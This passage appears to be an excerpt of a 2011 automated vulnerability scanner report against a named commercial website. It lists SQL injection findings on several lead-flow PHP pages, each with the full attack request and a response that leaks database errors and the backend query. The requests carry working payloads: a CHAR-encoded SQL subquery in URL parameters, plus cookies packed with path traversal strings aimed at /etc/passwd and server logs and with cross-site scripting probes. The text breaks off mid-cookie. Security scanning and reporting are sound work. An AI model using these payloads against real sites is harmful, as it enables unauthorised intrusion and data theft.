convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9e8rb3lfiffscj6mnsdocqt0j3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1g5egb3nr1ejfbahhjdb5kap66; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 